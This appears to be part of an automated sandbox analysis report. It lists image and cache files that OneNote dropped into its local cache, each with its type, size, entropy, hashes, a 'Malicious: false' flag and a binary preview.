SSDEEP:	768:6tCjwO+E+KW0ZtOgepcoWW4pAWQ6/KWcR474HOAZaDfK:68j+E+KW0HOgep/72/NKWcRNefK
MD5:	9700DE02720CDB5A45EDE51F1A4647EC
SHA1:	CF72A73E1181719B1CC45C2FE0A6B619081E115E
SHA-256:	7E6A7714A69688D9FFDF16AA942B66064A0C77FCD9B3E469F89730B4B9290C3E
SHA-512:	5438921467D62376472007B9EBF3C35C9D9FE3EDE04D99A990129332D53EBC8EE2555C0319A4F7C0DF63516F29CEDF2171D8B6DC34C9FCD075C2CA41EB728660
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!1..A...Qaq..".......2BR#...b%&6..'w.r.3f7W8.s5EUeF.g....CS$4.Vv..Tdt..G..(c..u.Hhx.......................!1.AQa..2.q....".s...3.4BRr.#......b.$c............?........uf.....t...;..[...W.h.....-.k.f..i.u..KQ..b.F...rM%/.8n.S..=9.....G$O;.f.}L..N..U._i.[.X...3.~....S.~..+t$...c.5......{..X/..#.G...}s....6......^....o~.$.\WA?...^*w[O.~..6..~....a....~..:..0.......{O...\|.s.u._w.........i...........{K...._.?.../{.....A..8....<g.iu..<..................X......\|]v....D..9.k.w.\|-IF.Tv.-.&.........."'.4.b....z.._.Z.....G...u.xyt./_.q..m>..S.V.Xdc.bw.T.W......g..........}s.._..?....U]_.......`......>.\|'.~xH....,...?........?.q....o../..R..;...Y.G....A"?......?.<..1...w..o.M.........tco.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000076.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.441307937687046
Encrypted:	false
SSDEEP:	48:zW2C0si+g3r6tq2uL7Er+eZLXSHL9OBDy6j4DZrd3r8xJDdX/gz2O7uy0:60s23r6E2uXExZLXcL98NwRbqDKzfuy
MD5:	1CA092700B69335A283DC63546C211FA
SHA1:	A4CB12CE5A4CF4B2ED8B7EF2DD461570757A55C1
SHA-256:	320D7D2C33B1EC9B4D4E71377DFDFB4C10471D14E59C379BA548245DB4B177AD
SHA-512:	51FE674E70D752CF5AFF8C143365C3B67A52C1389A22686AE9DA676FD523A02FA546AA5BB3651BF1FC924DCCBB4A63061FF92733C2A0A2E5F4712FD6DEA143C1
Malicious:	false
Preview:	2...>.......h...v...\...................................................................................................................................2...>...D.......v................................I.......I.qk..B.....LZ..Q.......Q%zp..'J..\....Q%zp..'J..\....Q..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................S..........{....N...^.................!....J....>.0........f........................................I.qk..B.....LZ...............S..........{...........S..........{...........Q.......Q.......Q...........................................Qj......QT.]....Q.......Q..B....QH......Q..B....Q..>.)..Q..J...................;........4...4...4.."................Q...Q...Q..z...y.. x.. ...........$........4...+..7+..7........................;........4...4...4...........Q.......Q....#..Q............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000077.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	25622
Entropy (8bit):	7.058784902089801
Encrypted:	false
SSDEEP:	384:EhK81gTCyJ/Gf9Aw3t8w8EtdPeGDh6bEi1Ie1u4ZbvgwTwrSRh7ZKNpIGY:IjcRXwdJvtdGsUbEi1IeY8vgwTyC1+Y
MD5:	F8CCFC24DEB1D991EBE085E1B2D7D9BF
SHA1:	AF76C22A765434AEDA134924C517C84107F4FED5
SHA-256:	7354001527AB554C44E7D6981B86DD933B7DC2E0D3DC8512AD3EECD843245C52
SHA-512:	818BC3690B01B30BC571E4CF45EC8D1AFCAECBAB003532644381F1CF730A5B3486862D08F7579B2D3D89167AD7DF35028881245C9550B0DA23D1F81A720A9704
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!...1A.Qaq.........."2Rr.#.t6..B..3S$4..v.b..Cs.%5..8..cUV.(.DEe.&Ff...T.d.......................!.1A..Qaq...s4....2r..S"BR.3....b#C$.....c............?..D.."}:......&&...?3..W.q.......]...m.Y.k1......K).J...uV.b.../.0.E.H..4..W_T.[t.V.w.9.x.qe.L..o.oL.....d.\.....6.\|.o...}..H{Yn..E...6Y3.l.e..D.:,.n.%...t...m.........,+,..\|..n.....6....f........6.../$../Vi..H...e.f.F.zn.).n.E..2sTn.i...Yb?6+H&...Bf......z.o.^7[..u.:o....t.s=.....(.s.....f.g....q9o.u1L.N...smzE..[>...+\O....j.<....j.c.W.............U..+.F/.'..W...T./W...>i01./....j.s."..Q...{...a._~OW...Rp.).e..W..Q4)<..'..W...q...'..U..z..g......U}...O....w....0F:.N..V.3W.\|..'z0.]...j..U[v..g$D.Lc[.e...UW.m0+

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000078.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.320302744251664
Encrypted:	false
SSDEEP:	48:Yubx0sMbc0BUEFxs0kTtuyEHGKlXZ+9U/Cj4p7rd3rUGmexl50dXqZWUEQN0oeUZ:YSx0smIL0kTrEmOXc9UaURbBme0KP
MD5:	5E81A38B421E48836A88222238786369
SHA1:	060A1F8E3507F22828E48FD7E30940659935DD72
SHA-256:	B0308C35B448BCCCB0E0EE9D464571811F673012BAC54B385E4C4247545E7BBB
SHA-512:	B075396C74F945FD577C1CE38AF806CFDBE34C3F8A5B9BA8B3F5430B1139EA624E5785039427C8CB44A5CB43F9CF3A3EFF9788C6E8FC434C915454D37E7328E6
Malicious:	false
Preview:	2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZ.W.......W..~U`.#u..;e.p.W..~U`.#u..;e.p.W...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............OG...#_...$.....N...^.................:...M..d............f........................................I.qk..B.....LZ..............OG...#_...$...........OG...#_...$...........W.......W.......W...........................................W.j.....W.T.]...W.......W...B...W.H.....W...B...W...>.).W...J...................;........4...4...4.."...............W...W...W...z...y.. x.. ...........$........4...+..7+..7........................;........4...4...4..........W.......W.....#.W.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000079.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 50 x 500, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	2033
Entropy (8bit):	6.8741208714657
Encrypted:	false
SSDEEP:	48:P37XYSDTz+UUl7DHt7Ah8l1+4ZfFclFUXwobKXlZr:v7j3z+UoDN0h8ugf2AwobMN
MD5:	CA7D2BECCBC3741D73453DCF21D846E0
SHA1:	E34B7788498E33FFF0CFB00125E6BA9E090F6CED
SHA-256:	E9EAD0BFC09D32CB366010CDFEDE1C432A2D1D550CB7332BADAC1BEE9482BC86
SHA-512:	7FE2C3654262B1EEBED4F6D83DA7D3450E1BE52500A3964185FC0092041506A237A2728E5D7EEA0A3814E413E822B803B789C49CF744D51816A2E4EDE5B4247B
Malicious:	false
Preview:	.PNG........IHDR...2.........H'......PLTE........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................[....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.\.W.G...=a.ewA..a.!r( ...%Dc..x.x....N.OO...3=...S...........~.z.D.0...g.2P.7.*M.#'....z.......3TPj.Z.[5....V..z'L3...a.j9..C>..9.z

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007A.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.343846399053039
Encrypted:	false
SSDEEP:	48:N8sVPPb5YtLhtEkJL0XLz90uuj4Zrd3rgxDdXp9fDdxd:6sR5Y9E8oXv90LcRb4/x
MD5:	23E237D57CF9EF5240E4B916E5922652
SHA1:	DEB45186724B4DD6A07FD84CDCCF39F248B540DA
SHA-256:	4152F83BFB0B3B171D5AE03BC7648437AE631367279787A0002BD0850B847EC4
SHA-512:	90F4FA2820A1204BE4FCD061C5522A530BB3B7B7F3094F7ACE53E6837F628B803304236612E29C8A4FD70595731787C79BEE08506702ACD0CABFA06FB9D0779D
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ...........>W...,.0V.W....>W...,.0V.W......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............,..o.+."x\|.........N...^................\.$..M.U.=.,[.........f........................................I.qk..B.....LZ.............,..o.+."x\|..............,..o.+."x\|.............................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...+..7+..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007B.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	55804
Entropy (8bit):	7.433623355028275
Encrypted:	false
SSDEEP:	1536:gVvci05lhVbfBcWvBLeynluexaWqzww/u5:gVUZhHDljaHww/u5
MD5:	4126992F65FE53D3E3E78F6B27FD49DC
SHA1:	BC0D76B69310DA9B909D3EE4CECBFE5F386BFB45
SHA-256:	3FBE3C1C238BD7DBC67F8CFF5F3BDDFD513C96A9851B9616477947D21DFF4B2E
SHA-512:	624853F5E56D224C8188F122B2C4724F867D4099E7FAAFB9C945BE7E2907900ADCF4AE97AB08909CF94E96FB6F381E3B6396D560D93EB2731E4E69CBFE628F10
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d..............................................................................................!1...AQ.aq"2.....BR..8x..r#..9b....3....CS$.'.cs.......7Gw.(.4%5&..Wg.h......tEVfv..H..........................!1A..Qa.q...."2..u6....BRr.#...b..3s..d...7.Cc.$Tt..S4.5Ue..&..%.................?...,...8..{..S.y.N....%..q.8..H[5....o..xg........)c(.eO.YO..._D..x.U.....%.S.r.r._.^..Su.h.Q.t.:.#?....x..B.S...Q.....oqF..%..8'.qx....%.2JKjF..{y.w0.a.RMb.c.Q{%....eW'..[IV..'ZW3...[...MN.....rO.:....$.i..7....Vrrr...I.r..M..Qo..j....q.^...N...J......%.J..)F...>$.....u........o...+......[.....t....R}.I..R..S..GB..:......).6_[^Xft...F.1.....zP....,.#....MG.T..Q.F.....)Fi../.I...,%.voEb.b.Z..V3..FT.}..[Z{....wd.z.e.....QwW(.).t..\..'....:)<W.<..&k...caRT.X(..K.....:f...]...q..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007C.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.444585792017674
Encrypted:	false
SSDEEP:	48:wseyfc2KPGt+vUtefEbzTX3kt690tj4GKrdMrP3/fdXeCOkiQt:wsBcpPGoU6ETXUk90t8RMP5
MD5:	4C7CEDA9E6E9FFC9F5EFFDCF4726A006
SHA1:	AB7F610CA43A5E4696A105E8E7EB69C75073300D
SHA-256:	2DBA5DA08117885A624446D74299C40A75AEC50FF57B61E57A587D898FA46268
SHA-512:	680BCB5F29D016879472BD7555A59A6FA96F6C163D9867A8A7C47C6D74619831D722C0999C43A5870D88F4119D1B0D8FFBF994D195796EFDE462ED9E3B2F6FBC
Malicious:	false
Preview:	2...>.......n...v...b...................................................................................................................................2...>...J.......v................................I.......I.qk..B.....LZ].......].......$..(%H.b].......$..(%H.b]....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................l.4Q....}l.A....N...^...............[...\|..H...+..mm........f........................................I.qk..B.....LZ...............l.4Q....}l.A...........l.4Q....}l.A.........].......].......]...........................................]..j....]..T.]..].......]....B..]..H....]....B..]....>.)]....J...................;........4...4...4.."..............]...]...]....z...y.. x.. ...........$........4...+..7+..7........................;........4...4...4.........].......]......#]..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007D.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3
Category:	dropped
Size (bytes):	59832
Entropy (8bit):	7.308211468398169
Encrypted:	false
SSDEEP:	1536:HS9SYFtN0+CRa9mfJy4zBAiIJhzrkHDV2hJK:yAmta+Tyy4zBIJW5WK
MD5:	DCDD543A4E0BA2C1909BA095D46FFBCB
SHA1:	B86C89537138FE07255354202D3EAD0B53B3C54D
SHA-256:	28F334B77068F71F5F92A95695433B950610204A0E5580CE567DB8FAD4993ECB
SHA-512:	5408C3259B7F3288A4BEB04342799AD5FE3A6F0EC7E92353B29B7E7E538DFA9903B39637226919E0421BC422635D25F5F8069DC7441864DC03E1B909BF5C2C84
Malicious:	false
Preview:	......JFIF.....H.H.....fExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:08:07.............................S.......................................................&.(.................................0.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d.................................................................................................................................................y...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......;R~+'....xh..~.n-}.......Te................^B..IU_....._...S......h.......!....9...A}6V=J......C..c.....Ug.Wh......

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007E.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.34507166082331
Encrypted:	false
SSDEEP:	48:3sPUp4xoYotMctUEQ28Xt9gGpbHOj4VrdMrGTdX9AianGtbiBXZ+g:3sFoYomcWEaXt9vOARMkYw
MD5:	C5D5534FEF43C9C3FA9A8A67F04C8051
SHA1:	2BA90106C97786332C87749316527507ADCA6F5A
SHA-256:	2B038B783396227A1E5835F6B168A925234B137CCF92492704B7A9C6C03A5E92
SHA-512:	262B3BAC416C92C56C17FD1D160C5CAC42D2D5447567AF4910059FCF10F3AA4EB461DF7302DE17EC7E3E2C51A81A2DADAAE29DEC094B0DF0C989A85864A1E165
Malicious:	false
Preview:	2...>.......T...v...H...................................................................................................................................2...>...0.......v...\|............................I.......I.qk..B.....LZ...........?.?.....`.....?.?.....`.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................T.......\v.8.....N...^................bx&+.[N....7...........H........................................I.qk..B.....LZ...............T.......\v.8............T.......\v.8.....................................................................j......T.^.............B......C......>......\|.... .3...................;........4...4...4.."........................z...y.. x.. ...........$........4...+..7+..7........................;........4...4...4......................#..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007F.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	33032
Entropy (8bit):	2.941351060644542
Encrypted:	false
SSDEEP:	384:ofmqvnCfmqsp1Ue5xzMq+Qh0dffUmS0w5xzMq+Qh0di:AGAp1rmSl
MD5:	ACF4A9F470281F475EA45E113E9FB009
SHA1:	B20698DDA5E5AFDD86BB359A6578C9860D5DF71F
SHA-256:	5DC2367A80588A7518DB5014122510BF0FD784711015EF83A8718336584F82D0
SHA-512:	998B7DB9DB08FD15A293267E2371052E436E024AF8D34F96D3C8FF04B1316678DFC1674C921CB404121FF381A4FC39DC759E6698F19D42A6261CBD39469B0A08
Malicious:	false
Preview:	....l...........................Ac...... EMF........$...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC........................F...(.......GDIC............^...........F...........EMF+*@..$..........?...........?.........@..X...L........................."B...B...B...................?...........??.....n............;...<..@<...<...<...<...<...=...=.. =..0=..@=..P=..`=..p=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...>...>...>...>...>...>...>...>.. >..$>..(>..,>..0>..4>..8>..<>..@>..D>..H>..L>..P>..T>..X>..\>..`>..d>..h>..l>..p>..t>..x>..\|>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...?...?...?...?...?...?

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007G.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 3005 x 184, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	12180
Entropy (8bit):	5.318266117301791
Encrypted:	false
SSDEEP:	96:k1bHyG/fKOOOOQJUg+g2S+kEm6alfsfsfn32:+bSG/yOOOOQ+g+gOab32
MD5:	5C859FF69B3A271A9AAB08DFA21E8894
SHA1:	3156302A7450ADFF4D1B6EC893E955D3764D4DD4
SHA-256:	B4A8E9A67EE0B897615AC4CCE388FFC175AB92D9E192E6875C79A4E7C1B5BB6E
SHA-512:	4CF518136EEBCA4F400A115D9B7BB0CAC9FA650BF910B99E15F04A259B7D3EFCFFD6796886FE09DB08C37C332B14BC8500845C09C8EAE1F2306F90E98D3C99E0
Malicious:	false
Preview:	.PNG........IHDR..............;j.....sRGB.........pHYs..........+..../9IDATx^...dW...S=.dL$.............-.`...'...x.7.D...(...$.?cO....9S]=.v...Z.......{..wNuf.&.....a.k5~...._..\.yk..v.....}{._.Q...5...._9o.n.....}7.].1v..t......q....3.<..0<.p.......0....s...... @....... @....... @....... @....... @...X.'..U-..... @....... @....... @....... @....... @......,I......+..... @....... @....... @....... @....... @........z...r.. @....... @....... @....... @....... @....... .$.C.KJ[.... @....... @....... @....... @....... @........&`.=X`.%@....... @....... @....... @....... @....... @....../)m.. @....... @....... @....... @....... @....... @ ....`.)....... @....... @....... @....... @....... @....K.0.....J....... @....... @....... @....... @....... @...`.....\.... @....... @....... @....... @....... @......,I......+..... @....... @....... @....... @....... @........z...r.. @....... @....... @....... @....... @....... .$.C.KJ[.... @....... @....... @....... @....... @........&`.=X`.%

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007H.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.342655326524829
Encrypted:	false
SSDEEP:	48:YsYmhtPAIqtExSEPEczowL4LXTw/L9f8skp575rdMraqqQX+E90GN:YsrPAIqy0EsAoweXUj9UhL5RMSY
MD5:	C97607817C1C48FD2DFCC9AE0BF6F47D
SHA1:	00A18788B5D2ADC09F033E04551034708FE25C92
SHA-256:	F09680703FB9179550B0105FC765515AF269CCE717C02C16660468684682D458
SHA-512:	2C9093E868C0095D42C67C29E00060B5A4CE23411C4E6C764E1AE68C1E602533D5AFF138491D026E162A08B5D80E7626E82A74C02EC007B45DA862687C63DB64
Malicious:	false
Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ\|.......\|.......2..X...a\|.......2..X...a\|....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............I4.........}.....N...^................N...L..;m...........f........................................I.qk..B.....LZ.............I4.........}..........I4.........}..........\|.......\|.......\|...........................................\|..j....\|..T.]..\|.......\|....B..\|..H....\|....B..\|....>.)\|....J...................;........4...4...4.."..............\|...\|...\|....z...y.. x.. ...........$........4...+..7+..7........................;........4...4...4.........\|.......\|......#\|..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007I.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 39 x 600, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	2104
Entropy (8bit):	7.252780160030615
Encrypted:	false
SSDEEP:	48:2PPEOtz2P/LJtVRaqBG8qFOPvHlcEXgkuwf+j:2PZFSjJDjqFOPPlXgG+j
MD5:	F6C596F505504044DF1E36BA5DA3F09B
SHA1:	BCF17EC408899B822492B47E307DE638CC792447
SHA-256:	EDBB86F160050FBF1F9860276802BAE292DBFD0BC98E3EA90D43D981E9F0C54A
SHA-512:	E8D067A1932CED8746FE7D665EEC34EA92A98AFF3DF26FFA9DD02742DDEA3C5654124A88A649FA33DB596F96A5FC9CB2C693D03132F1C8B254ACB56DB4763BD8
Malicious:	false
Preview:	.PNG........IHDR...'...X.......:....PLTE.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................{.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^..c.%i.F...m.m.f.m.m.m{&....X...9.....M.WUW.d.N.O...E$...$...)H....n....N.k..v.....v1L[w)w.}..!...Y.X.V.D.......[....;..[..;....

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007J.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.349903620681436
Encrypted:	false
SSDEEP:	48:msCrEFSateFCsE2JlZrtXh39NsqhpyFrdMrrIUPFXMsz5og:msTFSaAZE2PXh9NRhQRM5PPo
MD5:	54F7085EFED18CB50C21F8BA56E7F760
SHA1:	819C03ACCE8344B2F7EFFF30515864D4893614D9
SHA-256:	562E1D6CE0E8C4BE91E4BED8EF059F73017343A6C5A8A04C1F2AC63ACAE6FE5C
SHA-512:	4CAD9E0B122F4D50ED08E84E14DA9CBD5DCB2E473C79A2B55E19816B088391198992CC2B136ACA31ACB369CC77815D452BAA1C5C3112E658BAC22C6C72962AB2
Malicious:	false
Preview:	2...>.......T...v...H...................................................................................................................................2...>...0.......v...\|............................I.......I.qk..B.....LZ.`.......`......,..Z(...`......,..Z(...`...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................Y.7]."..G.6/L....N...^................u...f.K.m...3.........f........................................I.qk..B.....LZ...............Y.7]."..G.6/L...........Y.7]."..G.6/L..........`.......`.......`...........................................`.j.....`.T.]...`.......`...B...`.H.....`...B...`...>.).`...J...................;........4...4...4.."...............`...`...`...z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4..........`.......`.....#.`.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007K.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	14177
Entropy (8bit):	5.705782002886174
Encrypted:	false
SSDEEP:	192:EbgGcV/hlvpfal7rgYa8S7auAxwfuSTmCSNoFQ6NO7L:EbgGcVnpwimnd38FdQL
MD5:	7CDCE7EEBF795998DA6CAC11D363291C
SHA1:	183B4CC25B50A80D3EC7CCE4BF445BCFBAA6F224
SHA-256:	DE35AF949D4F83E97EE22F817AFE2531CC4B59FF9EE6026DCA7ECEBC5CF2737F
SHA-512:	560FB15A9C12758D11BB40B742A6EAD755F15AD10D6C5DEBA67F7BC8A2AE67C860831914CBCBCDED9E6B2D1D5F26A636B9BCEF178151F70B4D027316F94F27E1
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!.1..A....Qa".q..2.....&...B%6.'..R#3.$E.r457bS.DUFV.Wg(.......................1...3.Q..2Rr....s.4.!Aq.S.aC5B$%............?...n.Liq.}.{#....3/gg.1.M +..~3...q..+=..:.g.i1;P)7.....q..n.s"p...wx........v.t.f;..L/..~....y.r[.r.....n.n3..6i..g..}../........3..x.L.i?We..l.......~..<.;..6..o.....N.t.o6.l..~.......<...m.V...Q.7k.u./wq.t..;.I...}..{...>.L..3m..a....yd......6~.f..~Y..}+..<.[w..'-..?.v.7...v.u..4.......1];..u.MO.......s..p..ms.'.O-o...O......m.k.e....)t....i>..E\|....,iOyD\|.{......g.n...cu....=..........h.\.Q:?g/?.I.3._...t...d.n.0.%y....S.Q....S.&K.w..&wY<....%.g.v.....$y..#,i;.=...t...I6..yO..o.d..w\k...~......)..rK.......].u....N....e.s..kU.u..'}

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007L.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.345689087287112
Encrypted:	false
SSDEEP:	96:oskK0LykDHBEQbXr7Hdm9Tt/IRMWIvq6e/qV3t:oskK0LyEeQbXrjdm9Tt/IRMWIvq6e/qP
MD5:	792CCD16D7577A33E45F45CCB290CB14
SHA1:	CAEA69E75F8C5F03962E0EAB629A9BFD3BAF5C77
SHA-256:	7530F57E5119DB974388458A69CBD4E6892EDD56E4943642F7675CE6B6DB9004
SHA-512:	618362022D4A66A007921313B009AB0AF2B2F72A311951AC13ABA1D47EAF18E96862A07B53A8F0F27FD633A51590012FB6EA5C4AAAF5D2776E0BD8322CCE0636
Malicious:	false
Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ.?.......?...Q@...e...2..?...Q@...e...2..?...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............d...p'.=...T6.....N...^................-." G....u...........f........................................I.qk..B.....LZ.............d...p'.=...T6..........d...p'.=...T6...........?.......?.......?...........................................?.j.....?.T.]...?.......?..B...?.H.....?...B...?...>.).?...J...................;........4...4...4.."...............?...?...?...z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4..........?.......?.....#.?.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007M.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:44:07], progressive, precision 8, 611x163, components 3
Category:	dropped
Size (bytes):	36740
Entropy (8bit):	7.48266872907324
Encrypted:	false
SSDEEP:	768:3nwDxjTvoE0Rjwit4rjucDILWg7/Da0JgGQ8e1S8SA/Khos0:SxjTmZw7nucDILj77a0JgGQvScb
MD5:	9C205C8D770516C5AA70D31B2CA00AF3
SHA1:	9A1002F0CF7F92F1BE2BB25BAD61CEBFAC282482
SHA-256:	E111F96490755C7D71E87C88ACAEA38AFE55BB865B1A14A83C5BD239648D5E2C
SHA-512:	A3E105208B32831265428572B0937DD3C17B793D8611B2DA8D4939F1BEC6050999D375E3F6B87D53AD49DFA0EAE737B0141D37597AA42116C310761973D4A134
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:44:07............................c.........................................................(.....................&...........n.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d................................................................................................................................................."...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..o...4.gP.~.c...K{...V.=...].<.........vS.........s....(.t......X......kk7....~-...yF}^c.Z.\.G./.?t...>....:.>......./.ib..).

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007N.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.413558206812887
Encrypted:	false
SSDEEP:	96:bnxsJZKr9A2iELaXHs2P99vwRMrd/C7K3A:VsJZKZLLaXH399vwRMrd/C7d
MD5:	28357CA51CD62FBAED3737CA4E6A5F82
SHA1:	9FEDFE22C30FE327E628AFC33D5E9B5DB2BA65BE
SHA-256:	5DF1A040628B4C4F594E37ECED7FF4188B36A6A3EB21DEC3E7881C8D7213E2C7
SHA-512:	A292D4B33DDE1A29D4E034D41CB304507F9D026A98FC2A91329EA60B5E2B3FE3CFF715B3B7FACF5DC531E1CE425C022D7D920B9781F52BC65440B8801537A037
Malicious:	false
